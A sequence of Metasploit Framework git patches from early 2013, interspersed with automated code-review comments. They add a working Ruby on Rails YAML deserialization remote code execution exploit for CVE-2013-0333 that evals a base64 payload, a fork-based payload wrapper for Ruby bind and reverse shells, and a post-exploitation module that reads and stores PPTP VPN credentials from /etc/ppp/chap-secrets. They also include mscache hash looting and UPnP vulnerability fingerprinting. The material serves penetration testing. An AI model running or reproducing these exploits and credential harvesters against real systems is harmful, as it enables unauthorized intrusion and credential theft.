@@ -89,7 +89,7 @@ def do_login(user, pass) return :skip_user when /Invalid password/ vprint_status("#{@peer} - Username found: #{user}") - else /\<a href="process.php\?logout=1"\>/ + else /\<a href="process\.php\?logout=1"\>/ print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"") report_auth_info({ :host => rhost, diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index a2547640a1c2..abf9fb3f4692 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -61,6 +61,7 @@ def initialize(info={}) def check uri = normalize_uri(target_uri.path) + uri << '/' if uri[-1,1] != '/' res = send_request_raw({ 'method' => 'GET', 'uri' => uri diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index c04ea190f5ce..d5f5fc8acd53 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -63,6 +63,7 @@ def initialize(info={}) def check uri = normalize_uri(target_uri.path) + uri << '/' if uri[-1,1] != '/' res = send_request_raw({ 'uri' => uri, 'method' => 'GET' diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index dfc48fc27d3b..641783f5a31d 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -73,6 +73,7 @@ def initialize(info={}) def check tmp_rport = datastore['RPORT'] uri = normalize_uri(target_uri.host) + uri << '/' if uri[-1,1] != '/' datastore['RPORT'] = datastore['HTTPPORT'] res = send_request_raw({'uri'=>uri}) datastore['RPORT'] = tmp_rport From 1ea1ad3166de0c8c0fc888fd3cac53c6946620d6 Mon Sep 17 00:00:00 2001 
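Review bot: The changed line in vcms_login.rb is `else /\<a href="process\.php\?logout=1"\>/`, and a regex written after `else` is only an expression that is evaluated and discarded. The branch therefore runs for every response that matched none of the earlier `when` patterns, and each one is printed and passed to report_auth_info as a successful login; escaping the dot does not change that. Turning it into `when /\<a href="process\.php\?logout=1"\>/` and adding a separate `else` that logs an unexpected response would keep false positives out of the stored credentials. The case statement starts outside the hunk.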
From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 14:48:22 -0600 Subject: [PATCH 180/421] Fix the forgotten path() --- modules/auxiliary/scanner/http/glassfish_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index c7c18d50e771..a48c352431b6 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -98,7 +98,7 @@ def send_request(path, method, session='', data=nil, ctype=nil) headers['Content-Type'] = ctype if ctype != nil headers['Content-Length'] = data.length if data != nil - uri = normalize_uri(target_uri) + uri = normalize_uri(target_uri.path) res = send_request_raw({ 'uri' => "#{uri}#{path}", 'method' => method, From ca70041f32158a9af8e2981d8b698154f50a09bf Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 16:23:26 -0600 Subject: [PATCH 181/421] Adds a post module that loots chap-secrets --- .../post/linux/gather/pptpd_chap_secrets.rb | 120 ++++++++++++++++++ 1 file changed, 120 insertions(+) create mode 100644 modules/post/linux/gather/pptpd_chap_secrets.rb diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb new file mode 100644 index 000000000000..1972b0cba873 --- /dev/null +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb 
@@ -0,0 +1,120 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/post/common' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::File + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Linux Gather PPTP VPN chap-secrets Credentials', + 'Description' => %q{ + This module collects PPTP VPN information such as client, server, password, + and IP from your target server's chap-secrets file. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'linux' ], + 'SessionTypes' => [ "shell", "meterpreter" ] + )) + + register_options( + [ + OptString.new('FILE', [true, 'The default path for chap-secrets', '/etc/ppp/chap-secrets']) + ], self.class) + end + + + # + # Reads chap_secrets + # + def load_file(fname) + begin + data = cmd_exec("cat #{fname}") + rescue RequestError => e + print_error("Failed to retrieve file. #{e.message}") + data = '' + end + + if data =~ /^#{fname}: regular file, no read permission$/ or data =~ /Permission denied$/ + return :access_denied + elsif data =~ /\(No such file or directory\)$/ + return :not_found + elsif data.empty? + return :empty + end + + return data + end + + + # + # Extracts client, server, secret, and IP addresses + # + def extract_secrets(data) + tbl = Rex::Ui::Text::Table.new({ + 'Header' => 'PPTPd chap-secrets', + 'Indent' => 1, + 'Columns' => ['Client', 'Server', 'Secret', 'IP'] + }) + + data.each_line do |l| + # If this line is commented out, ignore it + next if l =~ /^[[:blank:]]*#/ + + found = l.scan(/(.+)[[:blank:]]+(.+)[[:blank:]]+(.+)[[:blank:]]+(.+)$/).flatten + + # Nothing is found, skip! + next if found.empty? 
+ + client = (found[0] || '').strip + server = (found[1] || '').strip + secret = (found[2] || '').strip + ip = (found[3] || '').strip + + tbl << [client, server, secret, ip] + end + + if tbl.rows.empty? + print_status("This file has no secrets: #{datastore['FILE']}") + else + print_line(tbl.to_s) + + p = store_loot( + 'linux.chapsecrets.creds', + 'text/csv', + session, + tbl.to_csv, + File.basename(datastore['FILE'] + ".txt") + ) + print_good("Secrets stored in: #{p}") + end + end + + + def run + fname = datastore['FILE'] + f = load_file(fname) + + case f + when :access_denied + print_error("No permission to read: #{fname}") + when :not_found + print_error("Not found: #{fname}") + when :empty + print_status("File is actually empty: #{fname}") + else + extract_secrets(f) + end + end + +end \ No newline at end of file From ee2579607ab89fd83eb8536aa08156944f043c6e Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 21:05:14 -0600 Subject: [PATCH 182/421] Working against 3.0.19 --- .../multi/http/rails_json_yaml_code_exec.rb | 109 ++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 modules/exploits/multi/http/rails_json_yaml_code_exec.rb diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb new file mode 100644 index 000000000000..4bd4765e4e93 --- /dev/null +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb 
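Review bot: load_file interpolates the FILE option straight into a shell command, `cmd_exec("cat #{fname}")`, so a path containing spaces or shell metacharacters is split or interpreted by the remote shell. The module already includes Msf::Post::File, and `data = read_file(fname)` would read the file without going through a shell, with the error matching below adjusted to suit. In extract_secrets the pattern with four greedy `(.+)` groups only matches lines that have all four columns, so an entry written without the IP column is skipped silently; it would help to log skipped lines or document that limitation. The new file also ends without a trailing newline.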
@@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'yaml' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStagerTFTP + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in the JSON request + processor of the Ruby on Rails application framework. This vulnerability allows + an attacker to instantiate a remote object, which in turn can be used to execute + any ruby code remotely in the context of the application. + + This module has been tested on RoR 3.0.19 + + The technique used by this module requires the target to be running a fairly recent + version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be + exploitable using the init_with() method, but this has not been demonstrated. 
+ + }, + 'Author' => + [ + 'charliesome', # PoC + 'espes', # PoC and Metasploit module + 'lian', # Identified the RouteSet::NamedRouteCollection vector + 'hdm' # Module merge/conversion/payload work + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-0333'], + ], + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Privileged' => false, + 'Targets' => [ ['Automatic', {} ] ], + 'DisclosureDate' => 'Jan 28 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), + OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) + + ], self.class) + + end + + # + # Create the YAML document that will be embedded into the JSON + # + def build_yaml_rails2 + + code = Rex::Text.encode_base64(payload.encoded) + yaml = + "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + + "eval(%[#{code}].unpack(%[m0])[0]);' " + + ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " + + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " + + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n" + yaml.gsub(':', '\u003a') + end + + + # + # Create the YAML document that will be embedded into the JSON + # + def build_yaml_rails3 + + code = Rex::Text.encode_base64(payload.encoded) + yaml = + "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + + "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " + + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" + yaml.gsub(':', '\u003a') + end + + + # + # Send the actual request + # + def exploit + + print_status("Sending Railsv3 request to #{rhost}:#{rport}...") + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path), + 'method' => datastore['HTTP_METHOD'], + 'ctype' => 'application/json', 
+ 'headers' => { 'X-HTTP-Method-Override' => 'get' }, + 'data' => build_yaml_rails3 + }, 25) + handler + + end +end From 92c736a6a944fed8738850672f87d3b1b29a19c1 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 21:34:39 -0600 Subject: [PATCH 183/421] Move fork stuff out of exploit into payload mixin Tested xml against 3.2.10 and json against 3.0.19 --- lib/msf/core/payload/ruby.rb | 39 ++++++++++++ .../multi/http/rails_json_yaml_code_exec.rb | 3 +- .../multi/http/rails_xml_yaml_code_exec.rb | 60 +++++-------------- .../payloads/singles/ruby/shell_bind_tcp.rb | 4 +- .../singles/ruby/shell_bind_tcp_ipv6.rb | 4 +- .../singles/ruby/shell_reverse_tcp.rb | 4 +- 6 files changed, 65 insertions(+), 49 deletions(-) create mode 100644 lib/msf/core/payload/ruby.rb diff --git a/lib/msf/core/payload/ruby.rb b/lib/msf/core/payload/ruby.rb new file mode 100644 index 000000000000..46980e348c34 --- /dev/null +++ b/lib/msf/core/payload/ruby.rb @@ -0,0 +1,39 @@ +# -*- coding: binary -*- +require 'msf/core' + +module Msf::Payload::Ruby + + def initialize(info = {}) + super(info) + + register_advanced_options( + [ + # Since space restrictions aren't really a problem, default this to + # true. + Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ]) + ] + ) + end + + def prepends(buf) + if datastore['PrependFork'] + buf = %Q^ + code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first + if RUBY_PLATFORM =~ /mswin|mingw|win32/ + inp = IO.popen(%(ruby), %(wb)) rescue nil + if inp + inp.write(code) + inp.close + end + else + if ! Process.fork() + eval(code) rescue nil + end + end + ^.strip.split(/\n/).map{|line| line.strip}.join("\n") + end + + buf + end + +end diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 4bd4765e4e93..018f5dbf532c 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb 
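Review bot: rails_json_yaml_code_exec.rb includes `Msf::Exploit::CmdStagerTFTP` and requires 'yaml', but nothing in the file uses either, and `build_yaml_rails2` is defined without being called from exploit. Unused mixins add options and methods to the module that a reader then has to rule out, so the include and the require should be dropped, and the unused builder either removed or marked with a comment saying it is not wired in yet. The status message also hard-codes "Railsv3", which will need to follow whatever exploit ends up sending.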
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -47,6 +47,7 @@ def initialize(info = {}) 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 28 2013', + 'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0)) register_options( @@ -94,6 +95,7 @@ def build_yaml_rails3 # Send the actual request # def exploit + p payload.encoded print_status("Sending Railsv3 request to #{rhost}:#{rport}...") send_request_cgi({ @@ -103,7 +105,6 @@ def exploit 'headers' => { 'X-HTTP-Method-Override' => 'get' }, 'data' => build_yaml_rails3 }, 25) - handler end end diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index b103422ff400..0d02e885fdc8 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -47,6 +47,7 @@ def initialize(info = {}) 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 7 2013', + 'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0)) register_options( 
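Review bot: `p payload.encoded`, added at the top of exploit in rails_json_yaml_code_exec.rb, dumps the raw encoded payload to standard output on every run and bypasses the framework's print_* and verbosity handling. It looks like a debugging leftover and should be removed, or become a `vprint_status` call if the output is wanted. The following hunk in this file drops the `handler` call at the end of the method, while rails_xml_yaml_code_exec.rb in the same commit keeps calling it inside its loop; if the difference is intentional a one-line comment would help the next reader.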
@@ -63,35 +64,12 @@ def initialize(info = {}) ], self.class) end - - # - # This stub ensures that the payload runs outside of the Rails process - # Otherwise, the session can be killed on timeout - # - def detached_payload_stub(code) - %Q^ - code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first - if RUBY_PLATFORM =~ /mswin|mingw|win32/ - inp = IO.popen("ruby", "wb") rescue nil - if inp - inp.write(code) - inp.close - end - else - if ! Process.fork() - eval(code) rescue nil - end - end - ^.strip.split(/\n/).map{|line| line.strip}.join("\n") - end - # # Create the YAML document that will be embedded into the XML # def build_yaml_rails2 - # Embed the payload with the detached stub - code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) + code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + @@ -108,8 +86,7 @@ def build_yaml_rails2 # def build_yaml_rails3 - # Embed the payload with the detached stub - code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) + code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + 
@@ -164,24 +141,17 @@ def build_request(v) # def exploit - print_status("Sending Railsv3 request to #{rhost}:#{rport}...") - res = send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", - 'method' => datastore['HTTP_METHOD'], - 'ctype' => 'application/xml', - 'headers' => { 'X-HTTP-Method-Override' => 'get' }, - 'data' => build_request(3) - }, 25) - handler - - print_status("Sending Railsv2 request to #{rhost}:#{rport}...") - res = send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", - 'method' => datastore['HTTP_METHOD'], - 'ctype' => 'application/xml', - 'headers' => { 'X-HTTP-Method-Override' => 'get' }, - 'data' => build_request(2) - }, 25) - handler + [2, 3].each do |ver| + print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") + send_request_cgi({ + 'uri' => datastore['URIPATH'] || "/", + 'method' => datastore['HTTP_METHOD'], + 'ctype' => 'application/xml', + 'headers' => { 'X-HTTP-Method-Override' => 'get' }, + 'data' => build_request(ver) + }, 25) + handler + end + end end diff --git a/modules/payloads/singles/ruby/shell_bind_tcp.rb b/modules/payloads/singles/ruby/shell_bind_tcp.rb index c7ccfff7b985..8a095ec25f89 100644 --- a/modules/payloads/singles/ruby/shell_bind_tcp.rb +++ b/modules/payloads/singles/ruby/shell_bind_tcp.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/payload/ruby' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' @@ -13,6 +14,7 @@ module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Ruby include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -31,7 +33,7 @@ def initialize(info = {}) end def generate - return super + ruby_string + return prepends(ruby_string) end def ruby_string diff --git a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb index 2e3926ca37af..e0860b0074a7 100644 
--- a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/payload/ruby' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' @@ -13,6 +14,7 @@ module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Ruby include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -31,7 +33,7 @@ def initialize(info = {}) end def generate - return super + ruby_string + return prepends(ruby_string) end def ruby_string diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index 0e149754cf5d..0bffe8832228 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/payload/ruby' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' @@ -13,6 +14,7 @@ module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Ruby include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -31,7 +33,7 @@ def initialize(info = {}) end def generate - return super + ruby_string + return prepends(ruby_string) end def ruby_string From c0757ce9053528b9effc118cf7b5d7c9ef011d1c Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 21:41:15 -0600 Subject: [PATCH 184/421] Add support for 2.x --- .../multi/http/rails_json_yaml_code_exec.rb | 25 +++++++++++++------ 1 file changed, 17 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 018f5dbf532c..1343d04a615a 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb 
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -90,6 +90,12 @@ def build_yaml_rails3 yaml.gsub(':', '\u003a') end + def build_request(v) + case v + when 2; build_yaml_rails2 + when 3; build_yaml_rails3 + end + end # # Send the actual request @@ -97,14 +103,17 @@ def build_yaml_rails3 def exploit p payload.encoded - print_status("Sending Railsv3 request to #{rhost}:#{rport}...") - send_request_cgi({ - 'uri' => normalize_uri(target_uri.path), - 'method' => datastore['HTTP_METHOD'], - 'ctype' => 'application/json', - 'headers' => { 'X-HTTP-Method-Override' => 'get' }, - 'data' => build_yaml_rails3 - }, 25) + [2, 3].each do |ver| + print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") + send_request_cgi({ + 'uri' => datastore['URIPATH'] || "/", + 'method' => datastore['HTTP_METHOD'], + 'ctype' => 'application/json', + 'headers' => { 'X-HTTP-Method-Override' => 'get' }, + 'data' => build_request(ver) + }, 25) + handler + end end end From dc199685556ea5066af47bc39ec46b9ecf1ec1be Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 22:21:03 -0600 Subject: [PATCH 185/421] Minor cleanups --- .../multi/http/rails_json_yaml_code_exec.rb | 30 ++++++++++--------- 1 file changed, 16 insertions(+), 14 deletions(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 1343d04a615a..b1c25b2b3d5c 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -6,7 +6,6 @@ ## require 'msf/core' -require 'yaml' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking 
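Review bot: `build_request(v)` has no `else` branch, so any value other than 2 or 3 makes the `case` return nil and the caller sends a request with no `data` instead of failing loudly. Add `else raise ArgumentError, "unsupported Rails version: #{v}"` before the closing `end` of the `case`. This commit does not add `build_yaml_rails2` (every inserted line is accounted for by the two hunks), and whether the file already defines it is not visible here. If it does not, the `when 2` branch raises NameError on the first loop iteration.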
@@ -18,24 +17,27 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution', 'Description' => %q{ - This module exploits a remote code execution vulnerability in the JSON request - processor of the Ruby on Rails application framework. This vulnerability allows - an attacker to instantiate a remote object, which in turn can be used to execute - any ruby code remotely in the context of the application. + This module exploits a remote code execution vulnerability in the + JSON request processor of the Ruby on Rails application framework. + This vulnerability allows an attacker to instantiate a remote object, + which in turn can be used to execute any ruby code remotely in the + context of the application. This vulnerability is very similar to + CVE-2013-0156 - This module has been tested on RoR 3.0.19 + This module has been tested successfully on RoR 3.0.9, 3.0.19, and + 2.3.15. - The technique used by this module requires the target to be running a fairly recent - version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be - exploitable using the init_with() method, but this has not been demonstrated. + The technique used by this module requires the target to be running a + fairly recent version of Ruby 1.9 (since 2011 or so). Applications + using Ruby 1.8 may still be exploitable using the init_with() method, + but this has not been demonstrated. }, 'Author' => [ - 'charliesome', # PoC - 'espes', # PoC and Metasploit module - 'lian', # Identified the RouteSet::NamedRouteCollection vector - 'hdm' # Module merge/conversion/payload work + 'jjarmoc', # Initial module based on cve-2013-0156, testing help + 'egypt', # Module + 'lian', # Identified the RouteSet::NamedRouteCollection vector ], 'License' => MSF_LICENSE, 'References' => 
@@ -106,7 +108,7 @@ def exploit [2, 3].each do |ver| print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", + 'uri' => normalize_uri(target_uri.path), 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/json', 'headers' => { 'X-HTTP-Method-Override' => 'get' }, From 464d048eca30bfeff8af42d5bc20baeb0cbc4030 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 22:25:57 -0600 Subject: [PATCH 186/421] Remove debugging print --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index b1c25b2b3d5c..4f31cb38f5d9 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -103,7 +103,6 @@ def build_request(v) # Send the actual request # def exploit - p payload.encoded [2, 3].each do |ver| print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") From da5436e565363af9c6387bb159f6a994d20173b0 Mon Sep 17 00:00:00 2001 From: lmercer <lmercer@mit.edu> Date: Mon, 28 Jan 2013 23:29:50 -0500 Subject: [PATCH 187/421] Made changes as described in Redmine issue 7605 --- modules/post/windows/gather/cachedump.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index dddf43ab7e71..a6299a173be4 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -516,9 +516,6 @@ def run end end - store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, - "mscache_credentials.txt", "MSCACHE Credentials") - print_status("John the Ripper format:") john.split("\n").each do |pass| 
@@ -527,8 +524,11 @@ def run if( @vista == 1 ) print_status("Hash are in MSCACHE_VISTA format. (mscash2)") + store_loot("mscache2.creds", "text/csv", session, @credentials.to_csv, "mscache2_credentials.txt", "MSCACHE v2 Credentials") + else print_status("Hash are in MSCACHE format. (mscash)") + store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, "mscache_credentials.txt", "MSCACHE v1 Credentials") end rescue ::Interrupt From 38785015e1386d90484f98265f8f95642ab0d9ce Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Mon, 28 Jan 2013 23:08:53 -0600 Subject: [PATCH 188/421] Missing period in description --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 4f31cb38f5d9..efa29002c81e 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -22,7 +22,7 @@ def initialize(info = {}) This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This vulnerability is very similar to - CVE-2013-0156 + CVE-2013-0156. This module has been tested successfully on RoR 3.0.9, 3.0.19, and 2.3.15. From 358f7cc62f7efb46c9befc0fbf231fb7ab7c3906 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Tue, 29 Jan 2013 00:15:39 -0600 Subject: [PATCH 189/421] Adds CVE reporting to the UPnP scanner --- .../auxiliary/scanner/upnp/ssdp_msearch.rb | 50 ++++++++++++++++++- 1 file changed, 49 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index aeb199f7339e..23297bf0cdb1 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb 
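Review bot: `store_loot` now runs only after the John the Ripper print loop, whereas the call removed by the previous hunk ran before it. An interrupt during that loop (this method rescues `::Interrupt` just below) therefore leaves the collected hashes unsaved. The two new calls differ only in three strings, so they can be picked once and stored before printing: `ltype, fname, desc = (@vista == 1) ? ["mscache2.creds", "mscache2_credentials.txt", "MSCACHE v2 Credentials"] : ["mscache.creds", "mscache_credentials.txt", "MSCACHE v1 Credentials"]` followed by `store_loot(ltype, "text/csv", session, @credentials.to_csv, fname, desc)`. `run` starts and ends outside this hunk.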
@@ -60,9 +60,57 @@ def scanner_postscan(batch) desc = bits.join(" | ") sinfo[:info] = desc - print_status("#{skey} SSDP #{desc}") + res[:vulns] = [] + + if res[:info][:server].to_s =~ /MiniUPnPd\/1\.0([\.\,\-\~\s]|$)/mi + res[:vulns] << { + :name => "MiniUPnPd ProcessSSDPRequest() Out of Bounds Memory Access Denial of Service", + :refs => [ 'CVE-2013-0229' ] + } + end + + if res[:info][:server].to_s =~ /MiniUPnPd\/1\.[0-3]([\.\,\-\~\s]|$)/mi + res[:vulns] << { + :name => "MiniUPnPd ExecuteSoapAction memcpy() Remote Code Execution", + :refs => [ 'CVE-2013-0230' ], + :port => res[:info][:ssdp_port] || 80, + :proto => 'tcp' + } + end + + if res[:info][:server].to_s =~ /Intel SDK for UPnP devices.*|Portable SDK for UPnP devices(\/?\s*$|\/1\.([0-5]\..*|8\.0.*|(6\.[0-9]|6\.1[0-7])([\.\,\-\~\s]|$)))/mi + res[:vulns] << { + :name => "Portable SDK for UPnP Devices unique_service_name() Remote Code Execution", + :refs => [ 'CVE-2012-5958', 'CVE-2012-5959' ] + } + end + + if res[:vulns].length > 0 + vrefs = [] + res[:vulns].each do |v| + v[:refs].each do |r| + vrefs << r + end + end + + print_good("#{skey} SSDP #{desc} | vulns:#{res[:vulns].count} (#{vrefs.join(", ")})") + else + print_status("#{skey} SSDP #{desc}") + end + report_service( sinfo ) + res[:vulns].each do |v| + report_vuln( + :host => sinfo[:host], + :port => v[:port] || sinfo[:port], + :proto => v[:proto] || 'udp', + :name => v[:name], + :info => res[:info][:server], + :refs => v[:refs] + ) + end + if res[:info][:ssdp_host] report_service( :host => res[:info][:ssdp_host], From 25ae49154a067e1a457ef2210494a4385dcc9cc6 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Tue, 29 Jan 2013 00:55:45 -0600 Subject: [PATCH 190/421] Added author, vprint dressing-up --- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) 
